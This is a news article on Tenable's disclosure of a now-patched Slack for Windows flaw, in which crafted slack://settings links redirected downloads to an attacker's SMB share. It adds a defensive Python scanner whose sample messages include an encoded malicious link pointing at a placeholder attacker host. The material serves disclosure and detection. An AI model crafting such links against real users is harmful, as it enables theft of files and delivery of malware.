Strangers in your Slack channel may have messed with Slack for Windows' download settings, redirecting files to a malicious shared folder. It's fixed now. NOAH BERGER/AFP/Getty Images
On May 17, researchers at Tenable revealed that they had found a vulnerability in the Windows version of the desktop application for Slack, the widely used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would allow the attacker not only to steal the files downloaded by a targeted user going forward, but it would potentially allow them to modify the files and add malware to them, so that when the victim opened the files, they would get a potentially nasty surprise.
Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.
The potential attack used a weakness in the way the "slack://" protocol handler was implemented in the Windows application. By creating a crafted link posted in a Slack channel, the attacker could alter the default settings of the client, changing the download directory, for example, to a new location with a URL such as "slack://settings/?update=". That path could be directed to a Server Message Block (SMB) file sharing location controlled by the attacker. Once clicked, all future downloads would be dropped onto the attacker's SMB server. This link could be disguised as a Web link; in a proof-of-concept, the malicious Slack attack posed as a link to Google.
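As an added illustration (not code from the Ars article or from Tenable), here is a defender-side check that scans message text for slack://settings/?update= deep links whose decoded payload points at an SMB or UNC location, the kind of settings change described above. The preference key and hostnames in the constructed sample messages are placeholders, not Slack's real setting names.

```python
"""Flag slack:// settings-update links whose payload points at an SMB/UNC location.

Added example, not part of the article or Tenable's advisory. It finds slack://
links in message text, decodes the query string, and reports any "update"
value that mentions a UNC path (\\host\share) or an smb:// URL.
"""
import re
from urllib.parse import urlsplit, parse_qs

# A slack:// link in free text; stops at whitespace, quotes or angle brackets.
SLACK_LINK_RE = re.compile(r"slack://[^\s\"'<>]+", re.IGNORECASE)
# A UNC path (\\host\share) or an smb:// URL anywhere in a decoded value.
SMB_RE = re.compile(r"(?:\\\\[\w.-]+\\|smb://)", re.IGNORECASE)

# Constructed sample messages: "downloadPath" and the hostnames are placeholders.
SAMPLE_MESSAGES = [
    "Quarterly numbers: https://docs.example.com/q2.pdf",
    "Join the channel: slack://channel?team=T000&id=C000",
    "Check this out: slack://settings/?update="
    "%7B%22downloadPath%22%3A%22%5C%5Cattacker.test%5Cshare%22%7D",
    "Change theme: slack://settings/?update=%7B%22theme%22%3A%22dark%22%7D",
]


def find_slack_links(text):
    """Return every slack:// link embedded in a message."""
    return SLACK_LINK_RE.findall(text)


def classify_link(link):
    """Return a finding dict, or None if the link is not a settings update aimed at SMB."""
    parts = urlsplit(link)
    if parts.scheme.lower() != "slack" or parts.netloc.lower() != "settings":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for value in query.get("update", []):
        if SMB_RE.search(value):
            return {"link": link, "update": value,
                    "reason": "settings update references an SMB/UNC path"}
    return None


def scan_messages(messages):
    """Run classify_link over every slack:// link in a batch of messages."""
    return [f for msg in messages for f in map(classify_link, find_slack_links(msg)) if f]


if __name__ == "__main__":
    for finding in scan_messages(SAMPLE_MESSAGES):
        print(finding["reason"], "->", finding["link"])
```

Links hidden behind an ordinary Web redirect, as in the Reddit scenario the article mentions, are only caught once the final slack:// URL is resolved, so this check belongs where the deep link is actually observed.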
A dissected view of a crafted Slack message with a malicious URL that changes the location where the Slack desktop application for Windows saves downloads.

In a blog post, Tenable's David Wells reviewed several ways that this could be used maliciously. Once the attacker had changed the default download location, "the attacker could have not only stolen the document, but even inserted malicious code in it so that when opened by victim after download (by the Slack application), their machine would have been infected," Wells wrote.
An attacker wouldn't even have to be a member of a Slack channel to successfully inject the URL, Wells noted; the link could be fed into a channel via an RSS feed, for example, as Slack channels can be set up to subscribe to them. "I could make a post to a very popular Reddit group that Slack users around the world are subscribed to," Wells explained. That post could include a Web link "that will redirect to our malicious slack:// link and change settings when clicked." However, this attack would likely throw up a dialog box warning that a Web link was trying to open Slack, so it wouldn't work unless a victim clicked with approval.